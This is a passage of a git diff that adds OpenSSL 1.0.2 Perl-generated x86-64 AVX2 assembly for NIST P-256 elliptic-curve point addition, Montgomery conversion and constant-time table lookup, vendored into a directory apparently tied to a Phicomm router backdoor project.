+	vpsubq	32*1-128(%rdx), $ACC1, $ACC1
+	vpsubq	32*2-128(%rdx), $ACC2, $ACC2
+	vpsubq	32*3-128(%rdx), $ACC3, $ACC3
+	vpsubq	32*4-128(%rdx), $ACC4, $ACC4
+	vpsubq	32*5-128(%rdx), $ACC5, $ACC5
+	vpsubq	32*6-128(%rdx), $ACC6, $ACC6
+	vpsubq	32*7-128(%rdx), $ACC7, $ACC7
+	vpsubq	32*8-128(%rdx), $ACC8, $ACC8
+
+	vpsubq	32*0-128(%rcx), $ACC0, $ACC0
+	vpsubq	32*1-128(%rcx), $ACC1, $ACC1
+	vpsubq	32*2-128(%rcx), $ACC2, $ACC2
+	vpsubq	32*3-128(%rcx), $ACC3, $ACC3
+	vpsubq	32*4-128(%rcx), $ACC4, $ACC4
+	vpsubq	32*5-128(%rcx), $ACC5, $ACC5
+	vpsubq	32*6-128(%rcx), $ACC6, $ACC6
+	vpsubq	32*7-128(%rcx), $ACC7, $ACC7
+	vpsubq	32*8-128(%rcx), $ACC8, $ACC8
+	call	avx2_normalize
+
+	lea	32*0($b_ptr), %rsi
+	lea	32*0($a_ptr), %rdx
+	call	avx2_select_n_store
+
+	#	H = U2 - X3
+	lea	`32*9*0`(%rsp), %rsi
+	lea	`32*9*0`($r_ptr), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*4`(%rsp), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#
+	lea	`32*9*7`(%rsp), %rsi
+	lea	`32*9*1`($a_ptr), %rdx
+	lea	`32*9*1`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*1`(%rsp), %rdx
+	lea	`32*9*1`($r_ptr), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize
+
+	lea	32*9($b_ptr), %rsi
+	lea	32*9($a_ptr), %rdx
+	call	avx2_select_n_store
+
+	#lea	32*9*0($r_ptr), %rsi
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_mul_by1_x4
+	#NORMALIZE
+	#STORE
+
+	lea	`32*9*1`($r_ptr), %rsi
+	lea	`32*9*1`($r_ptr), %rdi
+	call	avx2_mul_by1_x4
+	call	avx2_normalize_n_store
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	%xmm6, -16*10(%rbp)
+	movaps	%xmm7, -16*9(%rbp)
+	movaps	%xmm8, -16*8(%rbp)
+	movaps	%xmm9, -16*7(%rbp)
+	movaps	%xmm10, -16*6(%rbp)
+	movaps	%xmm11, -16*5(%rbp)
+	movaps	%xmm12, -16*4(%rbp)
+	movaps	%xmm13, -16*3(%rbp)
+	movaps	%xmm14, -16*2(%rbp)
+	movaps	%xmm15, -16*1(%rbp)
+___
+$code.=<<___;
+	mov	%rbp, %rsp
+	pop	%rbp
+	ret
+.size	ecp_nistz256_avx2_point_add_affine_x4,.-ecp_nistz256_avx2_point_add_affine_x4
+
+################################################################################
+# void ecp_nistz256_avx2_point_add_affines_x4(void* RESULTx4, void *Ax4, void *Bx4);
+.globl	ecp_nistz256_avx2_point_add_affines_x4
+.type	ecp_nistz256_avx2_point_add_affines_x4,\@function,3
+.align	32
+ecp_nistz256_avx2_point_add_affines_x4:
+	mov	%rsp, %rax
+	push    %rbp
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	lea	-8(%rax), %rbp
+
+# Result + 32*0 = Result.X
+# Result + 32*9 = Result.Y
+# Result + 32*18 = Result.Z
+
+# A + 32*0 = A.X
+# A + 32*9 = A.Y
+
+# B + 32*0 = B.X
+# B + 32*9 = B.Y
+
+	sub	\$`32*9*8+32*2+32*8`, %rsp
+	and	\$-64, %rsp
+
+	mov	$r_ptr_in, $r_ptr
+	mov	$a_ptr_in, $a_ptr
+	mov	$b_ptr_in, $b_ptr
+
+	vmovdqa	32*0($a_ptr_in), %ymm0
+	vmovdqa	.LAVX2_AND_MASK(%rip), $AND_MASK
+	vpxor	%ymm1, %ymm1, %ymm1
+	lea	256($a_ptr_in), %rax		# size optimization
+	vpor	32*1($a_ptr_in), %ymm0, %ymm0
+	vpor	32*2($a_ptr_in), %ymm0, %ymm0
+	vpor	32*3($a_ptr_in), %ymm0, %ymm0
+	vpor	32*4-256(%rax), %ymm0, %ymm0
+	lea	256(%rax), %rcx			# size optimization
+	vpor	32*5-256(%rax), %ymm0, %ymm0
+	vpor	32*6-256(%rax), %ymm0, %ymm0
+	vpor	32*7-256(%rax), %ymm0, %ymm0
+	vpor	32*8-256(%rax), %ymm0, %ymm0
+	vpor	32*9-256(%rax), %ymm0, %ymm0
+	vpor	32*10-256(%rax), %ymm0, %ymm0
+	vpor	32*11-256(%rax), %ymm0, %ymm0
+	vpor	32*12-512(%rcx), %ymm0, %ymm0
+	vpor	32*13-512(%rcx), %ymm0, %ymm0
+	vpor	32*14-512(%rcx), %ymm0, %ymm0
+	vpor	32*15-512(%rcx), %ymm0, %ymm0
+	vpor	32*16-512(%rcx), %ymm0, %ymm0
+	vpor	32*17-512(%rcx), %ymm0, %ymm0
+	vpcmpeqq %ymm1, %ymm0, %ymm0
+	vmovdqa	%ymm0, `32*9*8`(%rsp)
+
+	vpxor	%ymm1, %ymm1, %ymm1
+	vmovdqa	32*0($b_ptr), %ymm0
+	lea	256($b_ptr), %rax		# size optimization
+	vpor	32*1($b_ptr), %ymm0, %ymm0
+	vpor	32*2($b_ptr), %ymm0, %ymm0
+	vpor	32*3($b_ptr), %ymm0, %ymm0
+	vpor	32*4-256(%rax), %ymm0, %ymm0
+	lea	256(%rax), %rcx			# size optimization
+	vpor	32*5-256(%rax), %ymm0, %ymm0
+	vpor	32*6-256(%rax), %ymm0, %ymm0
+	vpor	32*7-256(%rax), %ymm0, %ymm0
+	vpor	32*8-256(%rax), %ymm0, %ymm0
+	vpor	32*9-256(%rax), %ymm0, %ymm0
+	vpor	32*10-256(%rax), %ymm0, %ymm0
+	vpor	32*11-256(%rax), %ymm0, %ymm0
+	vpor	32*12-512(%rcx), %ymm0, %ymm0
+	vpor	32*13-512(%rcx), %ymm0, %ymm0
+	vpor	32*14-512(%rcx), %ymm0, %ymm0
+	vpor	32*15-512(%rcx), %ymm0, %ymm0
+	vpor	32*16-512(%rcx), %ymm0, %ymm0
+	vpor	32*17-512(%rcx), %ymm0, %ymm0
+	vpcmpeqq %ymm1, %ymm0, %ymm0
+	vmovdqa	%ymm0, `32*9*8+32`(%rsp)
+
+	#	H = U2 - U1 = X2 - X1
+	lea	`32*9*0`($b_ptr), %rsi
+	lea	`32*9*0`($a_ptr), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#	R = S2 - S1 = Y2 - Y1
+	lea	`32*9*1`($b_ptr), %rsi
+	lea	`32*9*1`($a_ptr), %rdx
+	lea	`32*9*4`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#	Z3 = H*Z1*Z2 = H
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*2`($r_ptr), %rdi
+	call	avx2_mul_by1_x4
+	call	avx2_normalize
+
+	vmovdqa	`32*9*8`(%rsp), $B
+	vpor	`32*9*8+32`(%rsp), $B, $B
+
+	vpandn	$ACC0, $B, $ACC0
+	lea	.LONE+128(%rip), %rax
+	vpandn	$ACC1, $B, $ACC1
+	vpandn	$ACC2, $B, $ACC2
+	vpandn	$ACC3, $B, $ACC3
+	vpandn	$ACC4, $B, $ACC4
+	vpandn	$ACC5, $B, $ACC5
+	vpandn	$ACC6, $B, $ACC6
+	vpandn	$ACC7, $B, $ACC7
+
+	vpand	32*0-128(%rax), $B, $T0
+	 vpandn	$ACC8, $B, $ACC8
+	vpand	32*1-128(%rax), $B, $Y
+	vpxor	$T0, $ACC0, $ACC0
+	vpand	32*2-128(%rax), $B, $T0
+	vpxor	$Y, $ACC1, $ACC1
+	vpand	32*3-128(%rax), $B, $Y
+	vpxor	$T0, $ACC2, $ACC2
+	vpand	32*4-128(%rax), $B, $T0
+	vpxor	$Y, $ACC3, $ACC3
+	vpand	32*5-128(%rax), $B, $Y
+	vpxor	$T0, $ACC4, $ACC4
+	vpand	32*6-128(%rax), $B, $T0
+	vpxor	$Y, $ACC5, $ACC5
+	vpand	32*7-128(%rax), $B, $Y
+	vpxor	$T0, $ACC6, $ACC6
+	vpand	32*8-128(%rax), $B, $T0
+	vpxor	$Y, $ACC7, $ACC7
+	vpxor	$T0, $ACC8, $ACC8
+	`&STORE`
+
+	#	R^2 = R^2
+	lea	`32*9*4`(%rsp), %rsi
+	lea	`32*9*6`(%rsp), %rdi
+	lea	`32*9*8+32*2`(%rsp), %rcx	# temporary vector
+	call	avx2_sqr_x4
+	call	avx2_normalize_n_store
+
+	#	H^2 = H^2
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*5`(%rsp), %rdi
+	call	avx2_sqr_x4
+	call	avx2_normalize_n_store
+
+	#	H^3 = H^2*H
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*5`(%rsp), %rdx
+	lea	`32*9*7`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#	U2 = U1*H^2
+	lea	`32*9*0`($a_ptr), %rsi
+	lea	`32*9*5`(%rsp), %rdx
+	lea	`32*9*0`(%rsp), %rdi
+	call	avx2_mul_x4
+	#call	avx2_normalize
+	`&STORE`
+
+	#	Hsqr = U2*2
+	#lea	32*9*0(%rsp), %rsi
+	#lea	32*9*5(%rsp), %rdi
+	#call	avx2_mul_by2_x4
+
+	vpaddq	$ACC0, $ACC0, $ACC0	# inlined avx2_mul_by2_x4
+	lea	`32*9*5`(%rsp), %rdi
+	vpaddq	$ACC1, $ACC1, $ACC1
+	vpaddq	$ACC2, $ACC2, $ACC2
+	vpaddq	$ACC3, $ACC3, $ACC3
+	vpaddq	$ACC4, $ACC4, $ACC4
+	vpaddq	$ACC5, $ACC5, $ACC5
+	vpaddq	$ACC6, $ACC6, $ACC6
+	vpaddq	$ACC7, $ACC7, $ACC7
+	vpaddq	$ACC8, $ACC8, $ACC8
+	call	avx2_normalize_n_store
+
+	#	X3 = R^2 - H^3
+	#lea	32*9*6(%rsp), %rsi
+	#lea	32*9*7(%rsp), %rdx
+	#lea	32*9*5(%rsp), %rcx
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_sub_x4
+	#NORMALIZE
+	#STORE
+
+	#	X3 = X3 - U2*2
+	#lea	32*9*0($r_ptr), %rsi
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_sub_x4
+	#NORMALIZE
+	#STORE
+
+	lea	`32*9*6+128`(%rsp), %rsi
+	lea	.LAVX2_POLY_x2+128(%rip), %rax
+	lea	`32*9*7+128`(%rsp), %rdx
+	lea	`32*9*5+128`(%rsp), %rcx
+	lea	`32*9*0`($r_ptr), %rdi
+
+	vmovdqa	32*0-128(%rsi), $ACC0
+	vmovdqa	32*1-128(%rsi), $ACC1
+	vmovdqa	32*2-128(%rsi), $ACC2
+	vmovdqa	32*3-128(%rsi), $ACC3
+	vmovdqa	32*4-128(%rsi), $ACC4
+	vmovdqa	32*5-128(%rsi), $ACC5
+	vmovdqa	32*6-128(%rsi), $ACC6
+	vmovdqa	32*7-128(%rsi), $ACC7
+	vmovdqa	32*8-128(%rsi), $ACC8
+
+	vpaddq	32*0-128(%rax), $ACC0, $ACC0
+	vpaddq	32*1-128(%rax), $ACC1, $ACC1
+	vpaddq	32*2-128(%rax), $ACC2, $ACC2
+	vpaddq	32*3-128(%rax), $ACC3, $ACC3
+	vpaddq	32*4-128(%rax), $ACC4, $ACC4
+	vpaddq	32*5-128(%rax), $ACC5, $ACC5
+	vpaddq	32*6-128(%rax), $ACC6, $ACC6
+	vpaddq	32*7-128(%rax), $ACC7, $ACC7
+	vpaddq	32*8-128(%rax), $ACC8, $ACC8
+
+	vpsubq	32*0-128(%rdx), $ACC0, $ACC0
+	vpsubq	32*1-128(%rdx), $ACC1, $ACC1
+	vpsubq	32*2-128(%rdx), $ACC2, $ACC2
+	vpsubq	32*3-128(%rdx), $ACC3, $ACC3
+	vpsubq	32*4-128(%rdx), $ACC4, $ACC4
+	vpsubq	32*5-128(%rdx), $ACC5, $ACC5
+	vpsubq	32*6-128(%rdx), $ACC6, $ACC6
+	vpsubq	32*7-128(%rdx), $ACC7, $ACC7
+	vpsubq	32*8-128(%rdx), $ACC8, $ACC8
+
+	vpsubq	32*0-128(%rcx), $ACC0, $ACC0
+	vpsubq	32*1-128(%rcx), $ACC1, $ACC1
+	vpsubq	32*2-128(%rcx), $ACC2, $ACC2
+	vpsubq	32*3-128(%rcx), $ACC3, $ACC3
+	vpsubq	32*4-128(%rcx), $ACC4, $ACC4
+	vpsubq	32*5-128(%rcx), $ACC5, $ACC5
+	vpsubq	32*6-128(%rcx), $ACC6, $ACC6
+	vpsubq	32*7-128(%rcx), $ACC7, $ACC7
+	vpsubq	32*8-128(%rcx), $ACC8, $ACC8
+	call	avx2_normalize
+
+	lea	32*0($b_ptr), %rsi
+	lea	32*0($a_ptr), %rdx
+	call	avx2_select_n_store
+
+	#	H = U2 - X3
+	lea	`32*9*0`(%rsp), %rsi
+	lea	`32*9*0`($r_ptr), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#	H = H*R
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*4`(%rsp), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#	S2 = S1 * H^3
+	lea	`32*9*7`(%rsp), %rsi
+	lea	`32*9*1`($a_ptr), %rdx
+	lea	`32*9*1`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*1`(%rsp), %rdx
+	lea	`32*9*1`($r_ptr), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize
+
+	lea	32*9($b_ptr), %rsi
+	lea	32*9($a_ptr), %rdx
+	call	avx2_select_n_store
+
+	#lea	32*9*0($r_ptr), %rsi
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_mul_by1_x4
+	#NORMALIZE
+	#STORE
+
+	lea	`32*9*1`($r_ptr), %rsi
+	lea	`32*9*1`($r_ptr), %rdi
+	call	avx2_mul_by1_x4
+	call	avx2_normalize_n_store
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	%xmm6, -16*10(%rbp)
+	movaps	%xmm7, -16*9(%rbp)
+	movaps	%xmm8, -16*8(%rbp)
+	movaps	%xmm9, -16*7(%rbp)
+	movaps	%xmm10, -16*6(%rbp)
+	movaps	%xmm11, -16*5(%rbp)
+	movaps	%xmm12, -16*4(%rbp)
+	movaps	%xmm13, -16*3(%rbp)
+	movaps	%xmm14, -16*2(%rbp)
+	movaps	%xmm15, -16*1(%rbp)
+___
+$code.=<<___;
+	mov	%rbp, %rsp
+	pop	%rbp
+	ret
+.size	ecp_nistz256_avx2_point_add_affines_x4,.-ecp_nistz256_avx2_point_add_affines_x4
+
+################################################################################
+# void ecp_nistz256_avx2_to_mont(void* RESULTx4, void *Ax4);
+.globl	ecp_nistz256_avx2_to_mont
+.type	ecp_nistz256_avx2_to_mont,\@function,2
+.align	32
+ecp_nistz256_avx2_to_mont:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-8-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	vmovdqa	.LAVX2_AND_MASK(%rip), $AND_MASK
+	lea	.LTO_MONT_AVX2(%rip), %rdx
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	16*0(%rsp), %xmm6
+	movaps	16*1(%rsp), %xmm7
+	movaps	16*2(%rsp), %xmm8
+	movaps	16*3(%rsp), %xmm9
+	movaps	16*4(%rsp), %xmm10
+	movaps	16*5(%rsp), %xmm11
+	movaps	16*6(%rsp), %xmm12
+	movaps	16*7(%rsp), %xmm13
+	movaps	16*8(%rsp), %xmm14
+	movaps	16*9(%rsp), %xmm15
+	lea	8+16*10(%rsp), %rsp
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_to_mont,.-ecp_nistz256_avx2_to_mont
+
+################################################################################
+# void ecp_nistz256_avx2_from_mont(void* RESULTx4, void *Ax4);
+.globl	ecp_nistz256_avx2_from_mont
+.type	ecp_nistz256_avx2_from_mont,\@function,2
+.align	32
+ecp_nistz256_avx2_from_mont:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-8-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	vmovdqa	.LAVX2_AND_MASK(%rip), $AND_MASK
+	lea	.LFROM_MONT_AVX2(%rip), %rdx
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	16*0(%rsp), %xmm6
+	movaps	16*1(%rsp), %xmm7
+	movaps	16*2(%rsp), %xmm8
+	movaps	16*3(%rsp), %xmm9
+	movaps	16*4(%rsp), %xmm10
+	movaps	16*5(%rsp), %xmm11
+	movaps	16*6(%rsp), %xmm12
+	movaps	16*7(%rsp), %xmm13
+	movaps	16*8(%rsp), %xmm14
+	movaps	16*9(%rsp), %xmm15
+	lea	8+16*10(%rsp), %rsp
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_from_mont,.-ecp_nistz256_avx2_from_mont
+
+################################################################################
+# void ecp_nistz256_avx2_set1(void* RESULTx4);
+.globl	ecp_nistz256_avx2_set1
+.type	ecp_nistz256_avx2_set1,\@function,1
+.align	32
+ecp_nistz256_avx2_set1:
+	lea	.LONE+128(%rip), %rax
+	lea	128(%rdi), %rdi
+	vzeroupper
+	vmovdqa	32*0-128(%rax), %ymm0
+	vmovdqa	32*1-128(%rax), %ymm1
+	vmovdqa	32*2-128(%rax), %ymm2
+	vmovdqa	32*3-128(%rax), %ymm3
+	vmovdqa	32*4-128(%rax), %ymm4
+	vmovdqa	32*5-128(%rax), %ymm5
+	vmovdqa	%ymm0, 32*0-128(%rdi)
+	vmovdqa	32*6-128(%rax), %ymm0
+	vmovdqa	%ymm1, 32*1-128(%rdi)
+	vmovdqa	32*7-128(%rax), %ymm1
+	vmovdqa	%ymm2, 32*2-128(%rdi)
+	vmovdqa	32*8-128(%rax), %ymm2
+	vmovdqa	%ymm3, 32*3-128(%rdi)
+	vmovdqa	%ymm4, 32*4-128(%rdi)
+	vmovdqa	%ymm5, 32*5-128(%rdi)
+	vmovdqa	%ymm0, 32*6-128(%rdi)
+	vmovdqa	%ymm1, 32*7-128(%rdi)
+	vmovdqa	%ymm2, 32*8-128(%rdi)
+
+	vzeroupper
+	ret
+.size	ecp_nistz256_avx2_set1,.-ecp_nistz256_avx2_set1
+___
+}
+{
+################################################################################
+# void ecp_nistz256_avx2_multi_select_w7(void* RESULT, void *in,
+#			    int index0, int index1, int index2, int index3);
+################################################################################
+
+my ($val,$in_t,$index0,$index1,$index2,$index3)=("%rdi","%rsi","%edx","%ecx","%r8d","%r9d");
+my ($INDEX0,$INDEX1,$INDEX2,$INDEX3)=map("%ymm$_",(0..3));
+my ($R0a,$R0b,$R1a,$R1b,$R2a,$R2b,$R3a,$R3b)=map("%ymm$_",(4..11));
+my ($M0,$T0,$T1,$TMP0)=map("%ymm$_",(12..15));
+
+$code.=<<___;
+.globl	ecp_nistz256_avx2_multi_select_w7
+.type	ecp_nistz256_avx2_multi_select_w7,\@function,6
+.align	32
+ecp_nistz256_avx2_multi_select_w7:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-8-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	lea	.LIntOne(%rip), %rax
+
+	vmovd	$index0, %xmm0
+	vmovd	$index1, %xmm1
+	vmovd	$index2, %xmm2
+	vmovd	$index3, %xmm3
+
+	vpxor	$R0a, $R0a, $R0a
+	vpxor	$R0b, $R0b, $R0b
+	vpxor	$R1a, $R1a, $R1a
+	vpxor	$R1b, $R1b, $R1b
+	vpxor	$R2a, $R2a, $R2a
+	vpxor	$R2b, $R2b, $R2b
+	vpxor	$R3a, $R3a, $R3a
+	vpxor	$R3b, $R3b, $R3b
+	vmovdqa	(%rax), $M0
+
+	vpermd	$INDEX0, $R0a, $INDEX0
+	vpermd	$INDEX1, $R0a, $INDEX1
+	vpermd	$INDEX2, $R0a, $INDEX2
+	vpermd	$INDEX3, $R0a, $INDEX3
+
+	mov	\$64, %ecx
+	lea	112($val), $val		# size optimization
+	jmp	.Lmulti_select_loop_avx2
+
+# INDEX=0, corresponds to the point at infty (0,0)
+.align	32
+.Lmulti_select_loop_avx2:
+	vpcmpeqd	$INDEX0, $M0, $TMP0
+
+	vmovdqa		`32*0+32*64*2*0`($in_t), $T0
+	vmovdqa		`32*1+32*64*2*0`($in_t), $T1
+	vpand		$TMP0, $T0, $T0
+	vpand		$TMP0, $T1, $T1
+	vpxor		$T0, $R0a, $R0a
+	vpxor		$T1, $R0b, $R0b
+
+	vpcmpeqd	$INDEX1, $M0, $TMP0
+
+	vmovdqa		`32*0+32*64*2*1`($in_t), $T0
+	vmovdqa		`32*1+32*64*2*1`($in_t), $T1
+	vpand		$TMP0, $T0, $T0
+	vpand		$TMP0, $T1, $T1
+	vpxor		$T0, $R1a, $R1a
+	vpxor		$T1, $R1b, $R1b
+
+	vpcmpeqd	$INDEX2, $M0, $TMP0
+
+	vmovdqa		`32*0+32*64*2*2`($in_t), $T0
+	vmovdqa		`32*1+32*64*2*2`($in_t), $T1
+	vpand		$TMP0, $T0, $T0
+	vpand		$TMP0, $T1, $T1
+	vpxor		$T0, $R2a, $R2a
+	vpxor		$T1, $R2b, $R2b
+
+	vpcmpeqd	$INDEX3, $M0, $TMP0
+
+	vmovdqa		`32*0+32*64*2*3`($in_t), $T0
+	vmovdqa		`32*1+32*64*2*3`($in_t), $T1
+	vpand		$TMP0, $T0, $T0
+	vpand		$TMP0, $T1, $T1
+	vpxor		$T0, $R3a, $R3a
+	vpxor		$T1, $R3b, $R3b
+
+	vpaddd		(%rax), $M0, $M0	# increment
+	lea		32*2($in_t), $in_t
+
+        dec	%ecx
+	jnz	.Lmulti_select_loop_avx2
+
+	vmovdqu	$R0a, 32*0-112($val)
+	vmovdqu	$R0b, 32*1-112($val)
+	vmovdqu	$R1a, 32*2-112($val)
+	vmovdqu	$R1b, 32*3-112($val)
+	vmovdqu	$R2a, 32*4-112($val)
+	vmovdqu	$R2b, 32*5-112($val)
+	vmovdqu	$R3a, 32*6-112($val)
+	vmovdqu	$R3b, 32*7-112($val)
+
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	16*0(%rsp), %xmm6
+	movaps	16*1(%rsp), %xmm7
+	movaps	16*2(%rsp), %xmm8
+	movaps	16*3(%rsp), %xmm9
+	movaps	16*4(%rsp), %xmm10
+	movaps	16*5(%rsp), %xmm11
+	movaps	16*6(%rsp), %xmm12
+	movaps	16*7(%rsp), %xmm13
+	movaps	16*8(%rsp), %xmm14
+	movaps	16*9(%rsp), %xmm15
+	lea	8+16*10(%rsp), %rsp
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_multi_select_w7,.-ecp_nistz256_avx2_multi_select_w7
+
+.extern	OPENSSL_ia32cap_P
+.globl	ecp_nistz_avx2_eligible
+.type	ecp_nistz_avx2_eligible,\@abi-omnipotent
+.align	32
+ecp_nistz_avx2_eligible:
+	mov	OPENSSL_ia32cap_P+8(%rip),%eax
+	shr	\$5,%eax
+	and	\$1,%eax
+	ret
+.size	ecp_nistz_avx2_eligible,.-ecp_nistz_avx2_eligible
+___
+}
+}} else {{	# assembler is too old
+$code.=<<___;
+.text
+
+.globl	ecp_nistz256_avx2_transpose_convert
+.globl	ecp_nistz256_avx2_convert_transpose_back
+.globl	ecp_nistz256_avx2_point_add_affine_x4
+.globl	ecp_nistz256_avx2_point_add_affines_x4
+.globl	ecp_nistz256_avx2_to_mont
+.globl	ecp_nistz256_avx2_from_mont
+.globl	ecp_nistz256_avx2_set1
+.globl	ecp_nistz256_avx2_multi_select_w7
+.type	ecp_nistz256_avx2_multi_select_w7,\@abi-omnipotent
+ecp_nistz256_avx2_transpose_convert:
+ecp_nistz256_avx2_convert_transpose_back:
+ecp_nistz256_avx2_point_add_affine_x4:
+ecp_nistz256_avx2_point_add_affines_x4:
+ecp_nistz256_avx2_to_mont:
+ecp_nistz256_avx2_from_mont:
+ecp_nistz256_avx2_set1:
+ecp_nistz256_avx2_multi_select_w7:
+	.byte	0x0f,0x0b	# ud2
+	ret
+.size	ecp_nistz256_avx2_multi_select_w7,.-ecp_nistz256_avx2_multi_select_w7
+
+.globl	ecp_nistz_avx2_eligible
+.type	ecp_nistz_avx2_eligible,\@abi-omnipotent
+ecp_nistz_avx2_eligible:
+	xor	%eax,%eax
+	ret
+.size	ecp_nistz_avx2_eligible,.-ecp_nistz_avx2_eligible
+___
+}}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/geo;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-x86_64.pl
new file mode 100755
index 0000000..5b21574
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-x86_64.pl
@@ -0,0 +1,2993 @@
+#!/usr/bin/env perl
+
+##############################################################################
+#                                                                            #
+# Copyright 2014 Intel Corporation                                           #
+#                                                                            #
+# Licensed under the Apache License, Version 2.0 (the "License");            #
+# you may not use this file except in compliance with the License.           #
+# You may obtain a copy of the License at                                    #
+#                                                                            #
+#    http://www.apache.org/licenses/LICENSE-2.0                              #
+#                                                                            #
+# Unless required by applicable law or agreed to in writing, software        #
+# distributed under the License is distributed on an "AS IS" BASIS,          #
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
+# See the License for the specific language governing permissions and        #
+# limitations under the License.                                             #
+#                                                                            #
+##############################################################################
+#                                                                            #
+#  Developers and authors:                                                   #
+#  Shay Gueron (1, 2), and Vlad Krasnov (1)                                  #
+#  (1) Intel Corporation, Israel Development Center                          #
+#  (2) University of Haifa                                                   #
+#  Reference:                                                                #
+#  S.Gueron and V.Krasnov, "Fast Prime Field Elliptic Curve Cryptography with#
+#                           256 Bit Primes"                                  #
+#                                                                            #
+##############################################################################
+
+# Further optimization by <appro@openssl.org>:
+#
+#		this/original
+# Opteron	+12-49%
+# Bulldozer	+14-45%
+# P4		+18-46%
+# Westmere	+12-34%
+# Sandy Bridge	+9-35%
+# Ivy Bridge	+9-35%
+# Haswell	+8-37%
+# Broadwell	+18-58%
+# Atom		+15-50%
+# VIA Nano	+43-160%
+#
+# Ranges denote minimum and maximum improvement coefficients depending
+# on benchmark.
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
